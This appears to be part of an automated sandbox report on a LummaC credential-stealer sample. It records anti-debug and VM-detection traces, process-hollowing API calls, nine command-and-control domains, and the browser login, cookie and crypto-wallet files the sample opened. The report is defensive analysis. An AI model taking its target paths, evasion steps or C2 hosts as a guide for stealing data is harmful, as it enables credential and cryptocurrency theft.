Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 1fxm3u0d.exe, 00000003.00000003.2231439928.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 1fxm3u0d.exe, 00000003.00000003.2280756454.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165613383.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2308206349.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386763514.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2370076676.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2381261813.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2280589839.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2167175724.00000000033BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW3"
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: 1fxm3u0d.exe, 00000003.00000003.2380981803.000000000335C000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386552743.000000000335D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h

Source: C:\Users\user\Desktop\1fxm3u0d.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\1fxm3u0d.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\1fxm3u0d.exe

Code function: 0_2_0019A62A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0019A62A

Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_001BE1B4 mov edi, dword ptr fs:[00000030h]		0_2_001BE1B4
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00173D40 mov edi, dword ptr fs:[00000030h]		0_2_00173D40

Source: C:\Users\user\Desktop\1fxm3u0d.exe

Code function: 0_2_001A12F0 GetProcessHeap,

0_2_001A12F0

Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0019A62A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0019A62A
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00190ED8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00190ED8
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00190F5B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00190F5B
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00190F4F SetUnhandledExceptionFilter,	0_2_00190F4F

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\1fxm3u0d.exe

Code function: 0_2_001BE1B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_001BE1B4

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\1fxm3u0d.exe

Memory written: C:\Users\user\Desktop\1fxm3u0d.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: 1fxm3u0d.exe, 00000000.00000002.2415350957.0000000004575000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: servicedny.site
Source: 1fxm3u0d.exe, 00000000.00000002.2415350957.0000000004575000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: authorisev.site
Source: 1fxm3u0d.exe, 00000000.00000002.2415350957.0000000004575000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: faulteyotk.site
Source: 1fxm3u0d.exe, 00000000.00000002.2415350957.0000000004575000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: dilemmadu.site
Source: 1fxm3u0d.exe, 00000000.00000002.2415350957.0000000004575000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: contemteny.site
Source: 1fxm3u0d.exe, 00000000.00000002.2415350957.0000000004575000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: goalyfeastz.site
Source: 1fxm3u0d.exe, 00000000.00000002.2415350957.0000000004575000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: opposezmny.site
Source: 1fxm3u0d.exe, 00000000.00000002.2415350957.0000000004575000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seallysl.site
Source: 1fxm3u0d.exe, 00000000.00000002.2415350957.0000000004575000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: thighpecr.cyou

Source: C:\Users\user\Desktop\1fxm3u0d.exe

Process created: C:\Users\user\Desktop\1fxm3u0d.exe "C:\Users\user\Desktop\1fxm3u0d.exe"

Jump to behavior

Source: C:\Users\user\Desktop\1fxm3u0d.exe

Code function: 0_2_001910D6 cpuid

0_2_001910D6

Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: EnumSystemLocalesW,	0_2_001A5133
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: GetLocaleInfoW,	0_2_001A51A0
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: EnumSystemLocalesW,	0_2_001A5275
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: GetLocaleInfoW,	0_2_001A52C0
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_001A5367
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: EnumSystemLocalesW,	0_2_001A0BCD
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_001A4BE7
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: GetLocaleInfoW,	0_2_001A546D
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: EnumSystemLocalesW,	0_2_001A4E38
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: GetLocaleInfoW,	0_2_001A06C5
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_001A4EE0

Source: C:\Users\user\Desktop\1fxm3u0d.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\1fxm3u0d.exe

Code function: 0_2_00191EE5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00191EE5

Source: C:\Users\user\Desktop\1fxm3u0d.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: 1fxm3u0d.exe, 1fxm3u0d.exe, 00000003.00000003.2308365145.0000000005AE8000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320862491.0000000003422000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2307105487.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2369932201.0000000003433000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320950832.000000000342F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\1fxm3u0d.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1fxm3u0d.exe PID: 6596, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 1fxm3u0d.exe, 00000003.00000003.2283579467.000000000340F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: 1fxm3u0d.exe	String found in binary or memory: Wallets/ElectronCash
Source: 1fxm3u0d.exe, 00000003.00000003.2283579467.000000000340F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: 1fxm3u0d.exe, 00000003.00000003.2280756454.00000000033B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: 1fxm3u0d.exe, 00000003.00000003.2283579467.000000000340F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 1fxm3u0d.exe, 00000003.00000003.2283777558.0000000003425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: 1fxm3u0d.exe, 00000003.00000003.2280756454.00000000033B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: 1fxm3u0d.exe, 00000003.00000003.2283579467.000000000340F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 1fxm3u0d.exe, 00000003.00000003.2283579467.000000000340F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
